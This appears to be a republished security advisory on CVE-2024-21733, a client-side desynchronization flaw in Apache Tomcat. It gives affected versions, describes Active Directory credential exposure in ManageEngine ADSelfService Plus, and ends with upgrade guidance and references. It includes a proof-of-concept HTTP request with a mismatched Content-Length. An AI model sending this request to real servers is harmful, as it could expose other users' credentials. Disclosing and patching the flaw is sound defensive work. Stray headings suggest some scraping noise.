descriptive
Apache Tomcat® software is an open source implementation of Jakarta Servlet, Jakarta Server Pages, Jakarta Expression Language, Jakarta WebSocket, Jakarta Annotations, and Jakarta Authentication Specification. Authentication specification.
Apache Tomcat from 8.5.7 to 8.5.63 and from 9.0.0-M11 to 9.0.43 is vulnerable to client-side desynchronization (CSD) attacks.
affect (usually adversely)
A vulnerability related to client-side de-synchronization (CSD) occurs when a web server is unable to accurately handle the content length of a POST request. Using this issue, an attacker can manipulate the victim's browser to cause a misaligned disconnection from the website. This manipulation can lead to unauthorized extraction of sensitive data from server and client connections.
The severity of the impact varies depending on the application using Tomcat as the back-end web server, potentially exposing confidential information such as plaintext credentials. For example, our team found an instance in a version of ManageEngine's ADSelfService Plus portal prior to version 6304 where it was possible to surreptitiously obtain plaintext Active Directory credentials from client connections, as shown below.
PoC / Exploit
POST / HTTP/1.1
Host: hostname
Sec-Ch-Ua: "Chromium";v="119″, "Not?A_Brand";v="24″
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3; q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: keep-alive
Content-Length: 6
Content-Type: application/x-www-form-urlencoded
X
prescription
Users of affected versions should take one of the following mitigation measures:
Upgrading to Apache Tomcat 9.0.44 or later
Upgrading to Apache Tomcat 8.5.64 or later
Source: xer0dayz of Sn1perSecurity LLC responsibly reported this vulnerability to the Tomcat security team.
History: 2024-01-19 Original Bulletin
Full Security Bulletin: https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz
bibliography
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21733
https://tomcat.apache.org/security-9.html
https://tomcat.apache.org/security-8.html
https://portswigger.net/research/browser-powered-desync-attacks
https://hackerone.com/reports/2327341
Original article by Chief Security Officer, if reproduced, please credit https://cncso.com/en/cve-2024-21733-apache-tomcat-http-request-smuggling-html
